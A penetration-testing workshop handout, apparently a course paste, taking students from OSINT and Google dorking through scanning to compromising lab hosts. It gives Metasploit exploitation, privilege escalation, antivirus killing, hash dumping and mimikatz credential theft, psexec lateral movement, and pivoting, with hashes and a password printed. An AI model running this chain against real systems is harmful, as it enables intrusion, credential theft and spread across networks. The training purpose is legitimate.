New Advanced Pentester Night School 2016

################################
# Pentester Night School 2016  #
# By Joe McCray                #
################################


##########
# VMWare #
##########
- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.


##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec

---------------------------------------------------------------------------------------------------------------------------------


################################
# Tactical Pentest Methodology #
################################

The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.


-=-=-=-=-=- Phase 1 -=-=-=-=-=-


##########################################
# Step 1: External Target Identification #
##########################################
Find all of the IP ranges owned by your target company via the following websites:
- https://www.robtex.com/
- http://toolbar.netcraft.com/site_report

Look for weak SSL implementations
- https://www.ssllabs.com/ssltest/


#############################
# Step 2: Google Quick Hits #
#############################

Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.
https://www.exploit-db.com/google-hacking-database/

Really good google dorks to use:
site:yourtarget.com filetype:pcf
site:yourtarget.com filetype:ica

1. Footholds:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]


2. Passwords:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]


3. Sensitive Directories:
-------------------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=

Be sure to use 'site:yourtarget.com' [ google dork for the site above ]


Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.


###########################
# Step 3: Compromise Data #
###########################
Look to see if they have already been breached

Search for the target company (and their major competitors) in the Data Breach Database
http://www.privacyrights.org/data-breach

Place targetgcompany.com in the search box of the link below to look known breaches
http://zone-h.com/search

Replace targetgcompany.com with your target domain name to look for known XSS vulnerabilities in the site.
http://xssed.com/search?key=targetcompany.com


##############################
# Step 4: Build OSINT Report #
##############################

Passive Recon
-------------
Install this add-on and enumerate as much info as possible
- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/


Next we build at an OSINT report with the data gleaned from the previous steps:
https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc

We looked through this to get an idea of what is not only involved in doing passive recon, but what the actual output of the work should look like.

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 2 -=-=-=-=-=-
##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec


############################################
# Identifying External Security Mechanisms #
############################################

sudo /sbin/iptables -F
     strategicsec

cd /home/strategicsec/toolz


###########################
# Target IP Determination #
###########################
cd /home/strategicsec/toolz
perl blindcrawl.pl -d targetgcompany.com

-- Take each IP address and look ip up here:
http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2
fierce -dns targetgcompany.com
cd ..


cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254                               (DNS forward lookup against an IP range)


sudo nmap -sL 148.87.1.0-255
     strategicsec

sudo nmap -sL 148.87.1.0-255 | grep oracle
     strategicsec


sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
     strategicsec

Reference:
http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html


###########################
# Load Balancer Detection #
###########################
 Here are some command-line options to use for identifying load balancers:

dig google.com

cd ~/toolz
./lbd-0.1.sh targetgcompany.com


halberd targetgcompany.com


######################################
# Web Application Firewall Detection #
######################################

cd ~/toolz/wafw00f
python wafw00f.py http://www.targetgcompany.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
     strategicsec

sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
     strategicsec


---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 3 -=-=-=-=-=-
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf

sudo nmap -sP 10.0.0.0/24

sudo nmap -sL 10.0.0.0/24

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254


wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c propecia

sudo cp propecia /bin

propecia 10.0.0 22

propecia 10.0.0 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cd ~/toolz
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
sudo cp wkhtmltoimage-i386 /usr/local/bin/

git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb

cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt


vi screenshots.sh

#!/bin/bash
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html


sh screenshots.sh


##########################
# Nmap NSE tricks to try #
##########################
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24


####################################
# Finally, let's exploit something #
####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15

	https://www.exploit-db.com/search

	Search for:
	Savant httpd 3.1
	Apache httpd 2.0.58 ((Win32))


	Found one written in Python:
	https://www.exploit-db.com/exploits/18401/

	Found one for Savant 3.1 from Metasploit:
	https://www.exploit-db.com/exploits/16770/


cd ~/toolz/metasploit
./msfconsole
use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit


********************************** Figure out who and where you are **********************************

meterpreter> sysinfo


meterpreter> getuid


meterpreter> ipconfig


meterpreter> run post/windows/gather/checkvm


meterpreter> run get_local_subnets


********************************** Escalate privileges and get hashes **********************************


meterpreter> use priv


meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

	Got the following admin hash:
	Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz

meterpreter > kerberos

	This should give me the administrative password:
	)K5?Jocb(Yx


********************************** Enumerate the host you are on **********************************

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(savant_31_overflow) > back

msf>


********************************** Lateral Movement *******************************


Now we can run the PSEXEC exploit.

-- Option 1:
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass )K5?Jocb(Yx

set RHOST 10.0.0.15

set payload windows/meterpreter/bind_tcp

set LPORT 2345

exploit

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(psexec) >back

msf>

**********************************

-- Option 2:
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363

set payload windows/meterpreter/bind_tcp

set RHOST 10.0.0.15

set LPORT 5678

exploit


********************************** Set up your Pivot **********************************

meterpreter > background
                                                        <-- background the session
        You want to get back to this prompt:
        msf exploit(handler) > back                     <--- you need to get to main msf> prompt


        sessions -l                                     <--find a session you want to pivot through (note the IP and session number)

        Now set up Pivot with a route add
        ---------------------------------

route print												<--- should be blank

route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)


route print                                             <----- verify new route

******************************Scan through your Pivot ******************************

use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack

set PORTS 445

run


####################################
# Socks Tunneling with Proxychains #
####################################
--- Open a duplicate putty session to your Ubuntu host

sudo apt-get install -y proxychains
    strategicsec

sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080

        Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
        socks4  127.0.0.1 1080

***************************Set up a Socks Proxy through your Pivot *************************


use auxiliary/server/socks4a

set SRVHOST 127.0.0.1

set SRVPORT 1080

run

        --- Go back to your other putty session with the meterpreter shell
cd ~

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow


        ---close the duplicate putty session to your Ubuntu host